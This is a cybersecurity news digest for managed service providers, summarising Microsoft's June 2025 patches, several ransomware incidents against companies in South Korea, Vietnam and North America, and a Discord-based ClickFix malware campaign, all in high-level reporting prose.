MSP cybersecurity news digest, June 18, 2025

Microsoft’s June 2025 Patch Tuesday addresses 66 vulnerabilities, including one actively exploited zero-day and one publicly disclosed flaw. Ten of these are classified as "Critical" — mainly remote code execution issues, with others related to privilege escalation.

The zero-day, CVE-2025-33053, involves a WebDAV remote code execution flaw exploited by the APT group “Stealth Falcon.” This bug could allow attackers to run arbitrary code if a user clicks a malicious WebDAV link. Another notable flaw, CVE-2025-33073, is an SMB client privilege escalation vulnerability that could grant SYSTEM access via crafted scripts and was discovered by multiple researchers.

Microsoft has released patches for both, urging users to apply updates promptly, though the SMB flaw can also be mitigated via server-side SMB signing. These updates do not include fixes for Microsoft Edge, Power Automate or Mariner, which were addressed earlier this month.

A ransomware attack on Yes24, one of South Korea’s largest ticketing and online booking platform with annual sales of $472 million in 2024,  has disrupted the entertainment industry, halting bookings and delaying major events.

The breach has kept Yes24’s services offline for four days, affecting concert sales, e-book access and fan communities. High-profile events involving K-pop acts like Enhypen and Park Bo-gum have been canceled or postponed, while musicals now require printed or emailed proof of purchase. South Korea’s Personal Information Protection Commission has launched an investigation into potential customer data exposure and compliance with privacy laws. Yes24 stated that it has regained control of its admin account and is working to restore full service.

In a separate case a major Vietnamese energy company with billions in revenue suffered a ransomware attack affecting 1,000 servers, with attackers demanding $2.5 million, but as a state enterprise, it had no legal mechanism to pay the ransom.  The Ministry of Public Security’s A05 department, working with U.S. law enforcement, secured decryption keys to prevent catastrophic data loss that could have forced contract renegotiations affecting millions of households. Experts warn that Vietnam’s cybersecurity readiness is still low, with most enterprises lacking proper preparedness, backup strategies and periodic system assessments.

A new malware campaign exploits Discord’s vanity invite link system to hijack expired or deleted links, redirecting users to malicious servers.

Once on the fake server, victims are prompted to verify their identity via a social engineering technique called “ClickFix,” which tricks them into running a malicious PowerShell command. This command downloads a script from Pastebin that retrieves a first-stage downloader, ultimately delivering AsyncRAT and Skuld Stealer to the victim’s machine. AsyncRAT enables remote control of infected systems using a technique called “dead drop resolver” to fetch its C2 address from Pastebin, while Skuld targets Discord, browsers, gaming platforms and cryptowallets by stealing sensitive data including wallet seed phrases via injection techniques. The malware also uses tools like ChromeKatz to bypass Chrome's encryption and exfiltrates stolen data through Discord webhooks, making it hard to detect. Some fake DocuSign sites also use fake CAPTCHA checks to secretly copy malicious code to a victim's clipboard — a tactic known as clipboard poisoning. Executing this code sets up persistence through a GitHub-hosted script and downloads a final ZIP payload that runs a hidden executable.

Hosting on trusted platforms like GitHub, Bitbucket and Pastebin helps the attackers evade security systems. Discord has disabled the malicious bot and researchers have noted that the campaign has been mainly targeting users in the U.S., Europe and Asia.

United Natural Foods (UNFI), a leading grocery wholesale distributor in North America, was hit by a cyberattack, prompting the company to take some systems offline. The company employs over 28,000 people and reported $31 billion in revenue in 2024.

The disruption affected its ability to process and deliver orders to over 30,000 customer locations, including major clients like Whole Foods. UNFI activated its incident response plan, implemented containment measures, and began working with external cybersecurity experts to investigate and remediate the issue. Law enforcement has been notified, and temporary workarounds are in place to support customer service continuity. While the nature of the attack and potential data theft remain undisclosed, no ransomware group has claimed responsibility so far.

In a separate case, WestJet, Canada’s second-largest airline, is investigating a cybersecurity incident that affected internal systems and temporarily disrupted access to its website and mobile app. The company has activated internal response teams and is working with law enforcement and Transport Canada to contain the impact and protect sensitive data. While services have been mostly restored and operations remain safe, it is still unclear whether the disruption was caused by a ransomware attack.

A Fog ransomware attack in May 2025 targeted a financial institution in Asia and stood out due to its use of legitimate tools not commonly seen in ransomware incidents. The attackers used open-source pentesting tools like GC2, Adaptix and Stowaway, along with Syteca, a legitimate employee monitoring software.

GC2, previously linked to APT41, enabled command execution and data exfiltration through Google or Microsoft services. Stowaway facilitated the deployment of Syteca, likely for keylogging and screen capturing, indicating possible espionage motives. The attackers also used PsExec, SMBExec, Freefilesync and MegaSync for lateral movement and data theft, and created a persistent service on the network. Adaptix was deployed for C2 access, and Impacket was likely used to execute the ransomware.

Researchers suggested this attack may have had espionage objectives, with the ransomware possibly acting as a decoy or a secondary monetization tactic.